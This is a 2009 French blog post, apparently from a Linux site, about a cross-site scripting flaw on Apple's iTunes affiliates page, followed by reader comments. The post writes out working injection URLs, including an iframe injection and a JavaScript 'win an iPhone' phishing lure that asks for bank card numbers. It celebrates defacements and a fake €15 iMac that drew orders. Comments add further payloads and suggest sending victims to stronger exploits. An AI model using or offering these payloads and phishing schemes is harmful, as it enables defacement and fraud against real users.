Une faille de sécurité XSS découverte sur le site d'Apple


XSS Cross site scripting
Sur le site d'Apple, une faille XSS vient d'être découverte. C'est un peu l'attraction du moment, car n'importe qui peut l'exploiter afin d'y afficher les images de son choix. Apple n'a pas encore réagi, mais ce n'est sûrement qu'une question de temps avant qu'il comble ce trou de sécurité.

Hack Apple

1. L'exploit

L'exploit se situe au niveau de certaines variables GET (thumbnailUrl, itmsUrl ...) qui autorisent l'inclusion d'adresses externes. Voici un exemple d'url à utiliser :

http://www.apple.com/itunes/affiliates/download/?artistName=HACK&thumbnailUrl=http://hack.com/img.jpg&itmsUrl=http://hack.com/&albumName=<a href="http://hack.com/">HACK</a>

Edit : la faille vient d'être corrigée par Apple...

http://www.apple.com/fr/itunes/affiliates/download/?artistName=HACK&thumbnailUrl=http://hack.com/img.jpg&itmsUrl=http://hack.com/&albumName=<a href="http://hack.com/">HACK</a>

Edit 2 : la faille est toujours active pour la partie française du site.

Quelques variantes mises au point pour l'occasion. La version iFrame Injection :

http://www.apple.com/fr/itunes/affiliates/download/?artistName=HACK&thumbnailUrl=http://hack.com/img.jpg&itmsUrl=http://hack.com/&albumName=<iframe width="800" height="500" src="http://hack.com"></iframe>

La version Javascript injection "Gagner un iPhone" + Phishing :

http://www.apple.com/fr/itunes/affiliates/download/?artistName=IPHONE&thumbnailUrl=http://hack.com/img.jpg&itmsUrl=http://hack.com/&albumName=<a onclick="javascript:alert('Envoye votre numero de carte bleu et votre email a dtc@apple.com.ru')">CLIQUEZ-ICI pour gagner un iPhone</a>

2. Exemples d'injections

J'ai pris quelques captures d'exemples d'injections qui ont eu lieu sur le site. En voici quelques unes.

La pute de luxe

Hack Apple Pute

Quand Apple vend du Linux

Hack Apple Linux

L'iMac passe de 1500€ à 15€

Hack Apple iMac

La promo a d'ailleurs eu un franc succès. On a pu constater une pointe de 80 commandes validées en simultanée.

Hack Apple iMac

Comme quoi, le phishing peut rapporter gros.


24 Commentaires pour "Une faille de sécurité XSS découverte sur le site d'Apple"

Flux des commentaires de cet article Ajouter un commentaire
  •  

    :D

    RépondreRépondre
    Jérôme M. , le 4 novembre 2009 à 00:47
  •  

    Ce n'est pas vraiment une faille !
    On ne peut pas exécuter de JavaScript depuis l'URI car ils doivent vérifier la validité des données passées en variables GET avec des regexp par exemple.

    De ce fait, on ne peut ni faire de redirections, ni voler de cookies, ni quoi que ce soit à part s'amuser à afficher sa photo depuis le site d'apple.
    D'ailleurs en faisant ctrl+U, les données n'apparaissent même pas dans la source, elles sont écrites en javascript, je n'ai pas creusé davantage pour savoir comment...

    RépondreRépondre
    Lucas , le 4 novembre 2009 à 00:51
  •  

    @Lucas : Le principe du XSS c'est d'injecter des données arbitraires dans un site web. Là on injecte dans l'ordre du texte, une miniature, une image et une url. Pour moi ça reste une faille.

    Une personne malvaillante peut très bien l'utiliser pour arnaquer des gens.

    Exemple :

    1- envoi d'un spam "Gagner un iPhone" à plein de gens avec l'url malvaillante
    2- on peut injecter une url, donc on imagine que la page vue par les internautes sera une belle image "Gagnez un iPhone" + un lien vers un site externe
    3- sur le site externe, on demande l'email et le code de la carte bleu (il y en aura forcément un qui tombera dans le panneau ...)

    RépondreRépondre
    pti-seb , le 4 novembre 2009 à 00:59
  •  

    @pti-seb : On pourrait s'amuser à faire ça mais ça serait limite faire du phishing, sauf qu'on garde l'url d'apple.
    De toute façon cette "faille" vient d'être corrigé d'après ce que je vois :).

    RépondreRépondre
    Lucas , le 4 novembre 2009 à 01:14
  •  

    @Lucas : snif, on aura pas fait mumuse très longtemps, dommage. Sinon, je viens de voir des exemples d'urls avec des alertes dedans. Donc c'était possible d'y mettre du javascript visiblement.

    RépondreRépondre
    pti-seb , le 4 novembre 2009 à 01:18
  •  

    @pti-seb : Ils sont rapides chez Apple :p

    RépondreRépondre
    Lucas , le 4 novembre 2009 à 01:23
  •  

    C'est reparti apparemment :D

    RépondreRépondre
    Jérôme M. , le 4 novembre 2009 à 10:14
  •  

    @Jérôme M. : yes, elle est toujorus active pour la partie fr du site en faite. Mise à jour de l'article.

    RépondreRépondre
    pti-seb , le 4 novembre 2009 à 13:47
  •  

    On dirait que c'est aussi corrigé pour la partie FR. Faut vérifier je suis en 3G et des fois ça marche pas super !

    RépondreRépondre
    Kegeruneku , le 4 novembre 2009 à 14:09
  •  

    Ah non ça marche toujours !!! c'est fun xD

    RépondreRépondre
    Kegeruneku , le 4 novembre 2009 à 14:13
  •  

    @Kegeruneku : yes ça marche toujours. J'ai fait quelques variantes du coup. Une version iFrame injection et une version Javascript Injection.

    D'ailleurs je dédicace la version Javascript Injection + "Gagner un iPhone" à @Lucas, c'était juste pour lui montrer que mon idée est bien réalisable.

    RépondreRépondre
    pti-seb , le 4 novembre 2009 à 14:32
  •  

    Je pensais comme Lucas à la base car j'avais effectué mon test (une alert JS) sous Chrome qui bloque ce genre de truc avec le message suivant dans la console :

    Refused to execute a JavaScript script. Source code of script found within request.

    Plutôt bien pensé de la part de l'équipe de Chrome.

    RépondreRépondre
    Jeremy , le 4 novembre 2009 à 14:45
  •  

    Arf, moi qui pensais qu'ils avaient un bon parseur anti injection, je vois qu'on peut s'amuser à injecter pas mal de trucs même si le contenu des variables ne s'affiche pas tel quel dans la source html.

    http://www.apple.com/fr/itunes/affiliates/download/?artistName=test&thumbnailUrl=http://hack.com/img.jpg&itmsUrl=http://hack.com/&albumName=%3Cimg%20src=%22ht%22%20onerror=%22alert%28%27ok%27%29%22%20/%3E

    RépondreRépondre
    Lucas , le 4 novembre 2009 à 15:06
  •  

    Vous sauriez m'expliquer l'utilité de la partie "&itmsUrl=http://tux-planet.fr" ? (Pour la version de la voiture là :p )

    RépondreRépondre
    Georgestheyeti OLOL , le 4 novembre 2009 à 15:08
  •  

    Ce que je trouve aberrant, c'est que des gens sont capables de valider un formulaire pour acheter un iMac à 15€ !

    Faut pas s'étonner après que certains pleurent que l'on leur a piqué leur identifiants bancaires dans un email ou c'était marqué qu'ils allaient gagner 1000€ s'ils filent leurs identifiants ...

    RépondreRépondre
    Julien , le 4 novembre 2009 à 16:35
  •  

    Allez, un dernier pour la route .. http://j.mp/28KMmq :)

    RépondreRépondre
    Achille , le 4 novembre 2009 à 16:45
  •  

    @Jeremy : arf, pas con de la part de chrome effectivement.

    @Julien : le problème c'est que beaucoup de gens chercher à valider la commande, pour ensuite fiare une réclamation. Ils pensent que Apple à fait une erreur et espère en tiré profit.

    RépondreRépondre
    pti-seb , le 4 novembre 2009 à 16:52
  •  

    J'oubliais le screenshot qui va bien http://omicronlab.net/upic/4af1a357-a56.png
    (le lien "Linux" pointait vers http://www.zegeniestudios.net/ldc/) :)

    RépondreRépondre
    Achille , le 4 novembre 2009 à 17:22
  •  

    Damned, No-script m'empêche de voir vos âneries :wink:

    RépondreRépondre
    zo3 , le 4 novembre 2009 à 19:15
  •  

    avec une balise A qui réagi sur le hover...
    Javascript exécutable via la survol par la souris d'un élément HTML comme une image ou autre...

    http://tinyurl.com/yc738rq

    RépondreRépondre
    ^fabrice^^ , le 4 novembre 2009 à 21:08
  •  

    @^fabrice^^ : pas mal ton exemple, par contre j'avait pas lu ton post, j'ai cliqué sur ton lien puis arrivé sur le site d'apple, j'ai mis 5 minute a me demandé pourquoi une boite de dialogue apparaissais très souvent^^

    RépondreRépondre
    vincentpsp2 , le 5 novembre 2009 à 06:04
  •  

    Lol, c'est vraiment drôle !

    RépondreRépondre
    dsyjsrjsrd , le 17 avril 2010 à 22:40
  •  

    En même temp une xss tu en a une sur 8/10 site. Bon j'exagére un peu, mais tout les jour j'trouve des xss et encore je cherche pas vraiment, sinon j'en trouverais une toute les 5minute, un minimum.

    On peut faire bien plus qu'une simple redirection vers une page de pishing avec une xss ;)
    Je sais pas... pourquoi ne pas redirigé l'utilisateur vers un exploit plus puissant :) en toute confiance il acceptera tout ce qu'il lui est demander si sa vien d'apple.

    Sans compter que les utilisateur Apple/Linux ce sente invinsible hors il sont tellement vulnérable que je sourit à vous en parler. Il ne savent toujours pas qu'avec un windows tu peut pété un linux et avec un linux tu peut pété un windows. Bref, on les appel les humain.

    RépondreRépondre
    H_o , le 7 mars 2011 à 03:24
  •  

    @Jérôme M. : je veut une pute

    RépondreRépondre
    shael , le 19 septembre 2012 à 18:20
 

Ajouter un commentaire

actualité android apache apple astuce astuces bash bilboblog blog boot chrome clavier commande commandes conky date debian Desktop développement elementary exploit faille fedora firefox flash gimp gnome google graphique Graphisme hack hacking Hardware humour intel internet iphone jailbreak Jeux Kde kernel libre Linux log logiciels Logiciels Libres lucid lynx maemo mail maquette metasploit microsoft mobile mockup monitoring mozilla multi-touch musique mysql n900 nautilus nokia noyau openoffice open source password photos php Planet publicité red hat redhat rpm réseau screenshot script serveur serveurs shell sql ssh statistiques sysadmin system Sécurité thème tux-planet tv twitter ubuntu unity vidéo vidéos vlc voyage wallpaper windows wordpress yum